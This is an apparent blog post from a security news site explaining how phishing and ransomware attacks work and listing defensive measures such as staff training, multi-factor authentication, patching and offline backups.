Modern defense strategies must address every layer of your infrastructure, from container security best practices that isolate applications to comprehensive network monitoring.

Data breach consequences extend beyond immediate financial losses, potentially damaging your reputation and client trust.

That’s why a robust incident response plan is essential for staying ahead of threats that continuously evolve and bypass traditional security measures.

The Bait And Switch: How Phishing Attacks Work

Phishing attacks arrive through deceptive emails mimicking legitimate business communications. These fraudulent messages contain malicious links or attachments designed to capture credentials when clicked.

Cybercriminals aim to steal login information, financial data, and sensitive details that compromise security.

Fake Emails That Look Real

Today’s phishing attacks employ sophisticated impersonation that fools even experienced professionals. Criminals use social engineering and email spoofing to create convincing forgeries that bypass security measures.

1. Fake domains mimic legitimate URLs with subtle changes like switching letters—”bankofameríca.com” instead of “bankofamerica.com”
2. Visual tricks incorporate stolen logos and formatting to recreate authentic-looking messages.
3. Email spoofing manipulates headers to display legitimate company names in your inbox.

Always verify unexpected requests through established channels, even when they seem legitimate.

Harmful Links And Attachments

Malicious links and infected attachments serve as primary weapons in phishing attacks. These social engineering tactics exploit trust by disguising dangerous content as legitimate communications.

Before clicking any link, hover over it to preview the actual URL destination. When handling attachments, follow strict protocols never open files you weren’t expecting, even from known senders.

Regular training helps you spot telltale signs like urgency, poor grammar, or suspicious addresses.

Credential Theft Tactics

The primary objective of phishing is deceiving users into surrendering credentials through fraudulent websites. Cybercriminals create convincing replicas of legitimate platforms you trust.

Typical attack patterns include:

1. Using email spoofing to impersonate trusted organizations
2. Creating urgency or fear to manipulate immediate action
3. Directing victims to carefully crafted fake login pages

Protect yourself with multi-factor authentication and scrutiny of website URLs before entering sensitive information.

Holding Your Data Hostage: The Ransomware Threat

When ransomware infiltrates your network, it rapidly encrypts critical files, making them inaccessible. You’ll receive a message demanding cryptocurrency payment for the decryption key, typically with a deadline.

Beyond the ransom itself, you’ll face substantial costs from downtime, lost productivity, and potential permanent data loss if backups weren’t maintained.

System Lockdown Process

Ransomware systematically encrypts files using advanced algorithms that render data completely inaccessible. When your network falls victim, you face critical decisions requiring immediate action.

To protect your data control, consider these essential defenses:

1. Maintain secure, offline backups that ransomware can’t reach
2. Deploy advanced encryption and access controls to prevent system infiltration
3. Develop thorough incident response plans with regular threat intelligence updates

Without these measures, you’re vulnerable to attackers who can lock your files and demand hefty ransoms.

The Financial Impact

Once cybercriminals encrypt your files, they typically demand payment in cryptocurrency to provide the decryption key.

Their strategies often include strict deadlines and threats to permanently delete your data if you don’t comply quickly.

Paying the ransom doesn’t guarantee recovery criminals may take your money and disappear, or your decryption key might not work properly.

The true costs often stem from operational disruption and data loss:

1. Systems may remain offline for weeks, halting critical business functions
2. Recovery expenses include emergency IT services, system rebuilds, and legal fees
3. Long-term damage to business reputation leads to lost customers and market trust

Entry Points: How Threats Infiltrate Networks

Network vulnerability often stems from basic human mistakes, such as clicking suspicious links without verification. Inadequate security protocols, including weak passwords and outdated software, create dangerous gaps in defenses.

Third-party software vulnerabilities serve as entry points, allowing attackers to exploit known flaws before patches are implemented.

Human Error: The Weakest Link

The most vulnerable point in your security isn’t your firewall—it’s your team’s clicking behavior. Employee awareness is critical since a single misclick can compromise an entire system.

Key risk factors include:

1. Lack of security training leads to staff falling for sophisticated phishing attempts
2. Insufficient security tools leave employees exposed to malicious websites
3. Poor analysis systems fail to detect unusual patterns indicating compromised accounts

Security Gaps And Software Flaws

When running outdated software or relying on weak passwords, you’re leaving digital doors ajar. Inadequate firewalls can’t properly filter malicious traffic, while software vulnerabilities represent prime entry points for cybercriminals.

Your security is only as strong as its weakest component. Protect your network by implementing:

1. Automated patch management systems that deploy fixes immediately
2. Regular security audits to identify potential vulnerabilities
3. Intrusion detection systems that monitor for suspicious activity

Warning Signs: Spotting Potential Threats

Examine email addresses for subtle misspellings of legitimate domains. Watch for messages creating artificial urgency through threats of account closure.

When receiving unexpected requests for sensitive information, treat them with extreme skepticism, even if they appear to come from trusted sources.

Suspicious Sender Indicators

Cybercriminals put considerable effort into making phishing emails look legitimate. They use sophisticated sender-spoofing techniques to deceive vigilant users. Key warning signs include:

1. Addresses with unrecognized services or subtle domain misspellings
2. Display names matching contacts but email addresses that don’t match
3. Generic greetings or slight variations of executive names

Pressure Tactics

Legitimate business emails rarely create artificial pressure, but phishing scams often use urgent language to manipulate recipients into hasty actions.

Watch for threats claiming your account will be terminated unless you act within minutes. These tactics bypass natural skepticism through emotional manipulation.

Don’t let artificial deadlines force you into clicking suspicious links. Verify sender legitimacy through established channels, regardless of apparent urgency.

Protection Strategies: Securing Your Business

Implement multiple protection layers to shield your business from threats.

Your strategy should include thorough employee security training, strong password policies with multi-factor authentication, regular software updates, and reliable backup systems.

Staff Training And Authentication

Although technology plays an essential role in cybersecurity, your employees remain your critical defense against network threats.

Regular security awareness training empowers your team to recognize social engineering attempts before they escalate.

Strengthen your protection by implementing:

1. Strong password requirements including minimum length and complexity
2. Multi-factor authentication across all systems
3. Reliable credential storage solutions that prevent password reuse
4. Regular phishing simulations to test staff recognition skills

Updates And Backup Systems

Keeping software updated represents a fundamental security pillar. System updates aren’t just about new features they’re critical fixes that protect against known vulnerabilities.

Meanwhile, regular backups serve as your last defense against data loss. Your backup frequency should match how often critical data changes.

Implement strong encryption for stored and transmitted backup data, preventing unauthorized access during the backup process.

Regular testing verifies that your systems will work when needed. Remember, maintaining reliable backups that quickly restore operations is essential when other security measures fail.

The post From Phishing To Ransomware: Understanding The Threats In Your Network appeared first on Cyber Security News.